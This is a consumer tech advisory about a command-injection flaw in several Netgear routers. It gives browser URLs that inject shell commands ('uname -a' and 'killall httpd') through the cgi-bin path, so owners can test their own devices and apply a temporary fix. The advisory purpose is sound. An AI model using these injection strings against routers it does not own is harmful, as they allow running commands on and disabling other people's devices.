Skip to Main Content

PSA: Several Netgear Routers Have an Easily Exploitable Security Vulnerability, Here's How to Test Yours


Netgear has confirmed that several of its routers, including the R7000, R6400, and R8000 have a security issues that could allow someone to take control of your router if you click a malicious URL.

The routers infected included several of Netgear’s most popular models, including the “Nighthawk” series. Netgear has only confirmed three models, but others are suggesting the R7500, R7800, R8500, and the R9000 are all also affected. Netgear is working on a patch to correct for this, but until there’s an official solution, you can check yours for vulnerabilities and shore it up yourself. Data scientist Bas van Schaik has the details:

  1. Check your router for a vulnerability by going to http://[router-address]/cgi-bin/;uname$IFS-a in your browser (replacing [router-address] with your router’s IP address). If that page shows anything but an error or an empty page, your router is affected.

  2. If it is affected, you can terminate the web server process that’s exploitable. However, this will kill the web configuration interface on your router until you reboot it. This shouldn’t be a big deal unless you go into your router’s management tool often. If you’re okay with that, type this into your browser’s URL: http://[router-address]/cgi-bin/;killall$IFS’httpd’ and then head back to the URL in step one to verify it worked.

If you restart your router, the vulnerability will be open again, but at least it’s a temporary fix until Netgear releases an official patch. The only way someone could exploit this is if they sent you a malicious link and you clicked that link, which is pretty unlikely, but if you have one of these routers, it’s still probably better to be safe than sorry.

Update: Netgear’s released a beta firmware for the R7000 and the rest of their line if you don’t mind taking the beta route (thanks for pointing this out, Fritzo).

Stop using Netgear routers with unpatched security bug, experts warn | Ars Technica